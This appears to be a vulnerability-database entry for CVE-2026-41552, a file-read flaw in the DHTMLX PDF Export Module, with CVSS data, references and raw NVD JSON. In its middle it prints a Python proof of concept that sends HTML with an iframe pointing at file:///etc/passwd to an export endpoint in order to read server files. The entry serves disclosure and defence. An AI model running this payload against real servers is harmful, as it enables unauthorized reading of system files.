CVE-2026-41552

Description

PDF Export Module used in DHTMLX's products Gantt and Scheduler is vulnerable to Path Traversal due to lack of HTML sanitization. An unauthenticated user could craft the html payload which could include local files from the server and display them in the generated PDF. This issue was fixed in PDF Export Module version 0.7.6.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:dhtmlx:pdf_export_module:*:*:*:*:*:*:*:* - VULNERABLE

DHTMLX PDF Export Module < 0.7.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL example (replace with actual vulnerable endpoint)
target_url = "http://vulnerable-host/api/pdf/export"

# Malicious HTML payload attempting to read /etc/passwd
# Using iframe tag which is commonly rendered by PDF generators
payload = """
<!DOCTYPE html>
<html>
<body>
    <h1>Path Traversal PoC</h1>
    <iframe src="file:///etc/passwd" width="100%" height="600px"></iframe>
</body>
</html>
"""

# Data structure usually expected by these APIs (may vary by implementation)
data = {
    "html": payload,
    "format": "pdf"
}

try:
    print("[*] Sending payload to target...")
    response = requests.post(target_url, data=data)

    if response.status_code == 200:
        print("[+] Request successful. Checking content...")
        # Save the response content as a PDF file
        with open("cve_2026_41552_poc.pdf", "wb") as f:
            f.write(response.content)
        print("[+] PDF saved as 'cve_2026_41552_poc.pdf'. Open it to check for file content.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41552
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41552
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41552/
[4] VulDB https://vuldb.com/cve/CVE-2026-41552
[5] https://cert.pl/en/posts/2026/05/CVE-2026-7182
[6] https://docs.dhtmlx.com/gantt/guides/pdf-export-module-whatsnew/#076:~:text=Fixed%20Remote%20Code%20Execution%20and%20File%20Read%20vulnerabilities

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41552", "sourceIdentifier": "[email protected]", "published": "2026-05-15T13:16:18.990", "lastModified": "2026-05-19T16:49:51.997", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PDF Export Module used in DHTMLX's products Gantt and Scheduler is vulnerable to Path Traversal due to lack of HTML sanitization. An unauthenticated user could craft the html payload which could include\n local files from the server and display them in the generated PDF. \n\nThis issue was fixed in PDF Export Module version 0.7.6."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dhtmlx:pdf_export_module:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.3.3", "versionEndExcluding": "0.7.6", "matchCriteriaId": "7AB18C01-5B0B-4BBB-95F5-01637BE81188"}]}]}], "references": [{"url": "https://cert.pl/en/posts/2026/05/CVE-2026-7182", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://docs.dhtmlx.com/gantt/guides/pdf-export-module-whatsnew/#076:~:text=Fixed%20Remote%20Code%20Execution%20and%20File%20Read%20vulnerabilities", "source": "[email protected]", "tags": ["Release Notes"]}]}}